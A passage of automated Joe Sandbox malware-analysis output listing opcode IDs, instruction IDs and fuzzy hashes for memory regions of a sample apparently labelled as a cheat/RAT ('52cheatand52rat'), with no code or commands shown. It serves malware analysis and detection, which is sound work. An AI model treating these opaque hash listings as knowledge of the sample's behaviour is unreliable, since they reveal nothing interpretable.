                                        • Instruction ID: 715e8a3d2a40fbd835472b8e82622535c4eb0b205ae2fd87f8b05ec3f719e940
                                        • Opcode Fuzzy Hash: e1e18e1193ec8fa09332ef06e6417f96d8446030292157e8fd544e391baa78a1
                                        • Instruction Fuzzy Hash: C5B21F3470874ACFDB09DBA8D460B94B7E1FF5E365F5402F5E409CB2D6C968A8C1CA26
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d8dc687e33d7d65f176af4210289696c85c6356c5fd27705a5fe45814b34d64
                                        • Instruction ID: 67f8059dccb3cef234a5013073dd9e80930e12c69b213fad7deb95f84d4f5024
                                        • Opcode Fuzzy Hash: 3d8dc687e33d7d65f176af4210289696c85c6356c5fd27705a5fe45814b34d64
                                        • Instruction Fuzzy Hash: 3BC14831B0964E4FEBA4DB6888652B97BE2EF89310F05017EE41DD72E2CE686906C751
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20b2d51e619087d9c2a1f4f5c50f63b059d622f0d7d885199ac425fbdf8e63e1
                                        • Instruction ID: 20c750eab4d2e005074b6175e5d1a1a73c342a88f883540a59450d8c9867b037
                                        • Opcode Fuzzy Hash: 20b2d51e619087d9c2a1f4f5c50f63b059d622f0d7d885199ac425fbdf8e63e1
                                        • Instruction Fuzzy Hash: 02812731B1CB4D0FDBA8DB6C98556BA7BD2EB98350F00427FE44DD3296DE74A9028781
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58a2eac8ae7e69ce5629ee15e3cbb69158a7c7dc050c9909d3240e23fc811e9b
                                        • Instruction ID: 8d1341b644d3fd0324bf53c3104a1da93d350ee1421e3de2c72a63bd05038374
                                        • Opcode Fuzzy Hash: 58a2eac8ae7e69ce5629ee15e3cbb69158a7c7dc050c9909d3240e23fc811e9b
                                        • Instruction Fuzzy Hash: B6B11B21B0E68A4FEBB5DFA884312B97792FF96314F0501BAD459CB1E7CE64B901C361
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 837e875434b979b5bfa8050a4eab5790b37e93e64e95f599b14b3d87781fad38
                                        • Instruction ID: 125c021e6f151ef5c1b786815134450286244aecd95946c4f625c06346ce36ef
                                        • Opcode Fuzzy Hash: 837e875434b979b5bfa8050a4eab5790b37e93e64e95f599b14b3d87781fad38
                                        • Instruction Fuzzy Hash: E2812631B0CA4D4FD7A8DBAC9455AB9B7E2EF98351F05427FD04EC32E5DE64A8428780
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbc620514984de1b69a85b463f49622b13629994dc9083f45e1b7165aa6b44f3
                                        • Instruction ID: 4d1d32dc7be533587ebcb876e2b0eb25fb4d636a093c1ca386a63be82c5d0725
                                        • Opcode Fuzzy Hash: dbc620514984de1b69a85b463f49622b13629994dc9083f45e1b7165aa6b44f3
                                        • Instruction Fuzzy Hash: 55714831B1CB490FE768AB6C982667977C2DF99320F04027EF44DC72E7DD64A8428382
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbc9d468ce3278e8448d3640082a7f00a0efe31416d641bb42ea02c787beb0a2
                                        • Instruction ID: 8ac2698c7ee77277294a47f0412f8af2adf2851cf542565a09f8e25c74112638
                                        • Opcode Fuzzy Hash: bbc9d468ce3278e8448d3640082a7f00a0efe31416d641bb42ea02c787beb0a2
                                        • Instruction Fuzzy Hash: D951CF31A0CB4C4FDB58DF9888556EDBBF2FF99310F0442ABD449D7256CA74A845CB82
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40634432781234ac6e49a0125d4b2ca852e8af96848d7607d39e04846232c04a
                                        • Instruction ID: f4ff40475cc89557628699bf3625fd765322db41e2ddb1e7a7ec5a8e7520a550
                                        • Opcode Fuzzy Hash: 40634432781234ac6e49a0125d4b2ca852e8af96848d7607d39e04846232c04a
                                        • Instruction Fuzzy Hash: 4661C121A0964E8FEBA4EFAC88656B97BE2EF49340F0500B5D40DC71E7CE686D418B61
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e251dd2f99f944610e4d6776ad63cd5be17bbed1a0ab0dae61a5d62af792fd3
                                        • Instruction ID: bc490e826b8d32928f5018bb8cc2217492a1e50dd0fec53f79173f23efff3a39
                                        • Opcode Fuzzy Hash: 5e251dd2f99f944610e4d6776ad63cd5be17bbed1a0ab0dae61a5d62af792fd3
                                        • Instruction Fuzzy Hash: 8851D471F0AA4D4FEF58CB9888656BD77E3EFA9314F05417AD04DE3292CA742901C761
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8fa5e0153e3b4b85898922465db4851eefb977b68559c914c63d554569de9fc
                                        • Instruction ID: d022b1df8a8ccb7d91c1dafc98b41758ebe04e61c6e133a8215925e1fdcf8b17
                                        • Opcode Fuzzy Hash: d8fa5e0153e3b4b85898922465db4851eefb977b68559c914c63d554569de9fc
                                        • Instruction Fuzzy Hash: 9E71AC30E0564D8FDB94EFA4C865BECB7B2EF45304F5501B9D049EB2A2CEB92985CB11
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 664f853f11c94ede707e2f1cb40568893c186d5baa1b865872c815fd97cb8de3
                                        • Instruction ID: 53804b8c717c7fbc9f5bec6a8b7b906c82fd11a46b3a056e3f9e16de2d71024c
                                        • Opcode Fuzzy Hash: 664f853f11c94ede707e2f1cb40568893c186d5baa1b865872c815fd97cb8de3
                                        • Instruction Fuzzy Hash: 1E516E30A04A4E8FDB94EF58C850AEA73B2FF58314F504A69E42DC72E5CB74E951CB90
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 916fa7eabedc31e048d2cd6f7b5c1e42b08c420e9b1e55a826d4cd8329650c84
                                        • Instruction ID: 81d389581db892b702b04e61aa24bf4476389bd66eda9af7def9bc4b2d5423fb
                                        • Opcode Fuzzy Hash: 916fa7eabedc31e048d2cd6f7b5c1e42b08c420e9b1e55a826d4cd8329650c84
                                        • Instruction Fuzzy Hash: BD413930B1D7494FE329AB6C58266B577D1DF8A721F0402BEF449C72E3DD64B8428297
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e961c6c67570f72e805881601c5608caadfa750ad2b1dfbb4f47a1393fe785af
                                        • Instruction ID: 925250b179855ff324ac72fe5bf99f467d0bb66f2404be855f6e22c9a8aba9fa
                                        • Opcode Fuzzy Hash: e961c6c67570f72e805881601c5608caadfa750ad2b1dfbb4f47a1393fe785af
                                        • Instruction Fuzzy Hash: B6519271609B8E4FDB98CF1888B0A6537A2FF6A304B15019DE4ADC72D2DB75E912C750
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d3e050a807ae11843d40f41973e0cc2be6bbda4315808161107804861115c352
                                        • Instruction ID: 947a0d719df53ff0fba3013d0c62a2073c5462a8abc37c5ae88f3b5683b7c5ce
                                        • Opcode Fuzzy Hash: d3e050a807ae11843d40f41973e0cc2be6bbda4315808161107804861115c352
                                        • Instruction Fuzzy Hash: 4141E471B0990E8FEB98DF58C4646B977E2FFA8300F14413EE419D32A4DE78A942CB50
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba4c2e82f7d118fea6361dfbd1531b9667f9d7472af93de785f93cee9abde56c
                                        • Instruction ID: 3b5bab63e73073137beed578263beed1fc391f4d3e9ea8cc26592b669486dd06
                                        • Opcode Fuzzy Hash: ba4c2e82f7d118fea6361dfbd1531b9667f9d7472af93de785f93cee9abde56c
                                        • Instruction Fuzzy Hash: 5541D530E1964E8FD794EBA8C865AB9B7E1FF09300F4501B6D00AC72E2CE746D41C751
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c45915b729012aa969a18785a4cb46d1a4d1918613d924106b4deb0e1d3ddf97
                                        • Instruction ID: 71ce0ea9516c6d76e5a91225f54dbb24e4354ced83cf8917e835c1c94ac4e9c1
                                        • Opcode Fuzzy Hash: c45915b729012aa969a18785a4cb46d1a4d1918613d924106b4deb0e1d3ddf97
                                        • Instruction Fuzzy Hash: 19214931B1CA4E0FD7B4EB7C542A67477D2EF99624B0502FAE00DC32A3DC689C428391
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcd7016afe915bd77aa9d5114bf8c076743d59a76a3388f95cab5b99091aa567
                                        • Instruction ID: 8d40a5caf482992f89c3744b70c3f2c544bb8208ce2792980745b00e2278f81c
                                        • Opcode Fuzzy Hash: dcd7016afe915bd77aa9d5114bf8c076743d59a76a3388f95cab5b99091aa567
                                        • Instruction Fuzzy Hash: 8D21293065E7CA4FD767D7B888204657BE1EF9232170641BBD489CB1B2CE58D942C752
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e7120bb1d6a46844fc41440c59408d177052891f3d22557da2adfbc83fc3c5f
                                        • Instruction ID: 0ddae400c03c66126574ff642841c7f608fdbc6d5737a3a4d98f4b0bacd7411c
                                        • Opcode Fuzzy Hash: 1e7120bb1d6a46844fc41440c59408d177052891f3d22557da2adfbc83fc3c5f
                                        • Instruction Fuzzy Hash: 78210A31A0954D4FD751DFB8C8256D9BBF1EF4A310B0541FBD049CB2A3DA3859468B61
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 678dfb1a629fe3069db2959aa7deae3a161b237479262767e423cb7be642b34e
                                        • Instruction ID: f6fb3219cb56ad31cf60b665f5e9ace66c911484adaf4beddc8e256a7f918eb3
                                        • Opcode Fuzzy Hash: 678dfb1a629fe3069db2959aa7deae3a161b237479262767e423cb7be642b34e
                                        • Instruction Fuzzy Hash: AD112921B19D0D0FE6B4EB6C546A67573C3EF9C760F0505BAE00DC32A2DC64AC418391
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 239b63489c51ddf89a36c0b6fa33db8adfe4b4cafad46ccc73c7aab922f88743
                                        • Instruction ID: 7ff427705909afcc320d147cb40e7b47478f8aabaddee0d93569734ac216ef66
                                        • Opcode Fuzzy Hash: 239b63489c51ddf89a36c0b6fa33db8adfe4b4cafad46ccc73c7aab922f88743
                                        • Instruction Fuzzy Hash: 9011F632F0A95E5AF7B097A848312F976D2EF44310F42017DE41DE30F2DD9D2A0A2691
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4d9875db5ff8120d17cf22fd3f259f7c6aa0621dae4626a9d771726d6c8a871
                                        • Instruction ID: 4f2cbe72fb755911ea3cdafdc7d6d7d3ed9d2c34fff01af496469b28788ae167
                                        • Opcode Fuzzy Hash: e4d9875db5ff8120d17cf22fd3f259f7c6aa0621dae4626a9d771726d6c8a871
                                        • Instruction Fuzzy Hash: 9B016B20A0DA4A0FE776AB3844716647FD0DF86250F0901BBE449CB1E3DD9959C18313
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf4c549ec694037bea3acdf5c513f1e68c7a708446e71c5f0d116e249041f3b3
                                        • Instruction ID: 3d8e164a0f88fc49d6b266210dbf969362d73188d5ae2b587261151d1886679c
                                        • Opcode Fuzzy Hash: bf4c549ec694037bea3acdf5c513f1e68c7a708446e71c5f0d116e249041f3b3
                                        • Instruction Fuzzy Hash: 60014E32A0EA4D4BDF149B969C601D67795FF84325F04027EE41CC31A0DB655559C751
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f10f9bf8321f529c0ced0337f95b656381c576e79da2d23d43a5f7b89d96275
                                        • Instruction ID: 9312889edddbe5d3b56f9f045c63d10e17040ed445c3ba59f1149d1c2c442bac
                                        • Opcode Fuzzy Hash: 5f10f9bf8321f529c0ced0337f95b656381c576e79da2d23d43a5f7b89d96275
                                        • Instruction Fuzzy Hash: EF01843150DB8D5FC795D718D4605E6BFE1EF99320F45057EF489C72A1CE649A40C782
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1852918e1a50e5f4158d964346477ae51b73e3712b6eabe7a0caa04ea20ee6f
                                        • Instruction ID: 905b6c9d73ec24e9cbdac9b850ce337cb461add39e3b5688a4f084909ff238aa
                                        • Opcode Fuzzy Hash: a1852918e1a50e5f4158d964346477ae51b73e3712b6eabe7a0caa04ea20ee6f
                                        • Instruction Fuzzy Hash: 78F0A43260DB4D5BD7A8DB08D464AAAB7D2FFD8350F80053EF04AD33A0CEA5A9408781
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58d479abf84b05a2fe89624539a95677395b7a994b3fa41342551a6157bfc610
                                        • Instruction ID: e3fb00572566190795105fc34416ae213bdd8aaa1fc225211864039f80e695ab
                                        • Opcode Fuzzy Hash: 58d479abf84b05a2fe89624539a95677395b7a994b3fa41342551a6157bfc610
                                        • Instruction Fuzzy Hash: DBE0C071E0DB4C4FDF50AB5CA8205D93BA1FF86314F050069E01CC3280D6315D50C352
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cbb275320111cfbffed960fde6f18e95ba66fd8629fef6b740c3c86207fa433d
                                        • Instruction ID: 9e6e218527c042c772bb9b797a11596617eeebc4fe14f81f213d53d6a3666bff
                                        • Opcode Fuzzy Hash: cbb275320111cfbffed960fde6f18e95ba66fd8629fef6b740c3c86207fa433d
                                        • Instruction Fuzzy Hash: 57E0C222F4580E09EB24B3B42C369FDB28AEF88218FC24871E01DC20CBCD192A060181
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                        • Instruction ID: 2f4ce5eb3d920587ac7f8290b9bbbb02d000d5c1b0206ab61b5fe9b138ad115a
                                        • Opcode Fuzzy Hash: 70e8918fe7371c9bab7c28701d053cb59719dfdc8c999140cfded29c7f65db44
                                        • Instruction Fuzzy Hash: BFE0C222F9580F09EB58B7B42C369FDB246DF88218BC14871E02DC20CBCD592A054182
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd1a2f019c20f55140584e6d519474c2cd632d562cf6ff998675ad0261647f8e
                                        • Instruction ID: 2dddd3a1e773199ea479f942bd8d8e2a75f047c4d439b239467c99f2fca11d05
                                        • Opcode Fuzzy Hash: dd1a2f019c20f55140584e6d519474c2cd632d562cf6ff998675ad0261647f8e
                                        • Instruction Fuzzy Hash: 8AD05B3255C7094BC314DF54E4508DAB7A0FF88374F404B3DE0AE911E5DF6893818786
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                        • Instruction ID: ed5ee3db7d2cea3de7998dfdb7915874a8c9d1ef98afe3509fdc72c9578aace5
                                        • Opcode Fuzzy Hash: 16221b124af57809d56b8f66c6381ec09069ae95c286170e2da7745caba2f83e
                                        • Instruction Fuzzy Hash: 3AD05E3192CB094BD354DF14E4508DAB7A0FF84734F800B2DF06E861E5EEB492818686
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1835ec983f8286ee927086eca9fc6c5acbbfd69d037307dc2ae36630af36f63
                                        • Instruction ID: 98e02ff3b6050c2a3530fdaddcda453fd662efa5ca362ba9b21abe93554385fc
                                        • Opcode Fuzzy Hash: c1835ec983f8286ee927086eca9fc6c5acbbfd69d037307dc2ae36630af36f63
                                        • Instruction Fuzzy Hash: 40C0123252C64957D341A750E461CEB7351BF90210F801B79F05A41099DD5CA6448582
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ?O_I$O_^ $O_^"$O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-943114137
                                        • Opcode ID: f5d01d13cb062e7409fc55f73c56501c7fa28213c1a1ceff6974860a690654d4
                                        • Instruction ID: 14e6d2f7f5237597f971bd2ae7fd0060985976b78b57c8a2ed70fa5c8be8d4be
                                        • Opcode Fuzzy Hash: f5d01d13cb062e7409fc55f73c56501c7fa28213c1a1ceff6974860a690654d4
                                        • Instruction Fuzzy Hash: 82416B5370F6810BE7316BAC2C610E86B51EF5472A71882F7E0ED8E1DBE8546946C298
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-2383015730
                                        • Opcode ID: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                        • Instruction ID: b41423c9d0768159b0d4d02df5411f1d20eaa94b331ed1a744ffba951326ed21
                                        • Opcode Fuzzy Hash: 55b4d321bf5110345a9bed2c7e9949b33a90f6285e5e94064c057fb600d2b6d2
                                        • Instruction Fuzzy Hash: D2D012FE9900280DD6021CE418E04FC9B84860137F3202AA3D97FD9203C841D2D3D040
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000024.00000002.1877784365.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_36_2_7ffd9baa0000_52cheatand52rat.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O_^0$O_^2$O_^4$O_^6
                                        • API String ID: 0-2383015730
                                        • Opcode ID: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                        • Instruction ID: ab6424e3e7eb8e67ccfe0c47acba15ccd277b26c793373c6cc31ff39da11b87c
                                        • Opcode Fuzzy Hash: ab70584348ba4e5f5f14a7e23e48dd19a264103c1ef843e4a4ee4b26a8f717ea
                                        • Instruction Fuzzy Hash: 98B00213519052009315F56C78624E457514F1D13F74C47F3F4DD0C0D76C0534858184
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89b9853cdb576acb7a6793ad579f93a92d6010dc9252d6bbe4cd99992af114dc
                                        • Instruction ID: 21d33e0c91e0949f816514201464b5c679e141033965773bd0ed61f465fbf70a
                                        • Opcode Fuzzy Hash: 89b9853cdb576acb7a6793ad579f93a92d6010dc9252d6bbe4cd99992af114dc
                                        • Instruction Fuzzy Hash: 0A91EE31B0DA494FDB58DF5888615B977E2EFE8300B15467EE49DC32A2DE34AD02C781
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da8d6a3ef22bcc91557d2b5e1c7ddd983f837e2f3b961d3113e4ca5323e460
                                        • Instruction ID: 91eb40417dbfca045c43f855f1904a4b4f637a194eb67e74e9156baa361bd5ef
                                        • Opcode Fuzzy Hash: 70da8d6a3ef22bcc91557d2b5e1c7ddd983f837e2f3b961d3113e4ca5323e460
                                        • Instruction Fuzzy Hash: C5717172A1994D8FE798DB6898657EDBBE1EF99314F5003BAD01DC72DACBB418018B40
                                        Memory Dump Source
                                        • Source File: 0000002C.00000002.1981321050.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_44_2_7ffd9bad0000_portrefNet.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
